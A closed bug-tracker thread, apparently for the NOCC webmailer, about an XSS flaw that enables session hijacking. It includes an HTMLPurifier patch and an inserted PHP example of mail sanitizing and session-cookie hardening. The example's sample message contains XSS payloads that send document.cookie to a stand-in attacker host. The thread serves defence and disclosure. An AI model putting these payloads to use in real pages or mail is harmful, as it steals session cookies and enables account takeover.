
#399 Session Hijacking with Cross Site Scripting

Reproducible
Status: closed-fixed
Security (3)
Priority: 9
Updated: 2012-06-18
Created: 2012-05-02
Private: No

By sending a mail containing some well-formatted code, session hijacking is possible.
As this issue is really serious, I will inform Tim Gerundt and send details by email directly.

Details will be given as soon as this security issue is fixed.

Discussion

  • Gunnar Haslinger

    • priority: 5 --> 9
    • assigned_to: nobody --> gerundt
     
  • Gunnar Haslinger

    Patch for removing the XSS vulnerability with HTMLPurifier

     
  • Gunnar Haslinger

    I wrote a patch addressing this vulnerability.
    It depends on HTMLPurifier, which can be downloaded from http://htmlpurifier.org/releases/htmlpurifier-4.4.0.zip

    1. The directory "library/HTMLPurifier" (and its subdirectories) from the htmlpurifier-4.4.0.zip file has to be copied into the nocc-webmailer directory.

    2. Take the patched action.php from my ZIP file patch.zip and overwrite the original one from NOCC.

    3. Take the patched functions.php from my ZIP file patch.zip and overwrite the original one (located in the folder utils).

    The unpatched versions (extension ".original") are included too, so that you can check my changes by making a diff.

     
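The three steps above wire HTMLPurifier into NOCC but do not show the calling code. The block below is an added example, not NOCC's own code and not the contents of patch.zip, of the pattern such a patch implements: the HTML body of an untrusted message is run through HTMLPurifier before it is echoed into the message view, and the session cookie is flagged so that a future filter bypass cannot read it from document.cookie. It assumes the "library" directory of htmlpurifier-4.4.0.zip (the HTMLPurifier/ tree plus its sibling HTMLPurifier.auto.php loader) sits next to the script; the function names and the sample message are this example's own.

```php
<?php
// Added example, not NOCC's own code and not the patch.zip from the report:
// run an untrusted HTML mail body through HTMLPurifier before echoing it, and
// set session-cookie flags that limit the damage of any future filter bypass.
// Assumes the "library" directory of htmlpurifier-4.4.0.zip (HTMLPurifier/
// and HTMLPurifier.auto.php) sits next to this script; the function names and
// the sample mail are this example's own.

require_once __DIR__ . '/library/HTMLPurifier.auto.php';

/**
 * Build an HTMLPurifier instance configured for mail bodies.
 * Everything not on the whitelist (script, style, iframe, object, forms,
 * on* event handlers, javascript: URLs) is removed, not merely escaped.
 */
function mail_body_purifier()
{
    $config = HTMLPurifier_Config::createDefault();
    $config->set('HTML.Allowed',
        'p,br,b,strong,i,em,u,a[href|title],ul,ol,li,blockquote,pre,'
        . 'h1,h2,h3,h4,span,div,table,tr,td[colspan|rowspan],th,'
        . 'img[src|alt|width|height]');
    // Do not let the mail pull remote images/objects (tracking pixels, and
    // one fewer place where a URL parsing quirk could matter).
    $config->set('URI.DisableExternalResources', true);
    // Links in mail get rel="nofollow" so the webmailer does not vouch for them.
    $config->set('HTML.Nofollow', true);
    // HTMLPurifier caches parsed definitions on disk by default; disable that
    // unless a cache directory writable by the web server user has been set up.
    $config->set('Cache.DefinitionImpl', null);
    return new HTMLPurifier($config);
}

/**
 * Sanitize one mail body. The purifier is built once and reused because
 * constructing it is the expensive part.
 */
function sanitize_mail_html($untrusted_html)
{
    static $purifier = null;
    if ($purifier === null) {
        $purifier = mail_body_purifier();
    }
    return $purifier->purify($untrusted_html);
}

/**
 * Defence in depth for the session itself. HttpOnly keeps the session id out
 * of document.cookie, so script that slips past the filter cannot simply
 * exfiltrate it; Secure keeps it off plaintext HTTP. Call before session_start().
 */
function harden_session_cookie()
{
    ini_set('session.cookie_httponly', '1');
    ini_set('session.cookie_secure', '1');     // assumes the webmailer is served over HTTPS
    ini_set('session.use_only_cookies', '1');  // never accept a session id from the URL
}

// Constructed sample message (not from the report): ordinary formatting mixed
// with the usual cookie-stealing vectors a hostile sender would try.
$sample_body = <<<'HTML'
<p>Hello, <b>please</b> check the <a href="https://example.com/invoice">invoice</a>.</p>
<script>new Image().src = 'http://attacker.invalid/c?' + document.cookie;</script>
<img src="x" onerror="fetch('http://attacker.invalid/c?' + document.cookie)">
<a href="javascript:alert(document.cookie)">click me</a>
HTML;

harden_session_cookie();
session_start();
header('Content-Type: text/html; charset=utf-8');
echo sanitize_mail_html($sample_body);
```

HTMLPurifier is the right tool only for bodies that are rendered as HTML; subject lines, addresses and anything else printed as text still need htmlspecialchars(). The cookie flags do not stop XSS, they only keep a stolen-cookie attack from being a one-liner: script that runs in the victim's session can still read the mailbox or send mail through the page itself, so the sanitizer remains the actual fix.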
  • Tim Gerundt

    Tim Gerundt - 2012-05-28
    • status: open --> open-accepted
     
  • Gunnar Haslinger

    Works in my tests too.
    Looks fine.

     
  • Tim Gerundt

    Tim Gerundt - 2012-06-18

    I will release NOCC 1.9.3 at the weekend, which includes the fix:
    http://nocc.sourceforge.net/download/

     
  • Tim Gerundt

    Tim Gerundt - 2012-06-18

    Fixed in SVN.

    It'll be included in the next release.

    But you can download daily snapshots at:
    http://nocc.sourceforge.net/download/

    Thanks for the bug report.

     
  • Tim Gerundt

    Tim Gerundt - 2012-06-18
    • status: open-accepted --> closed-fixed
     
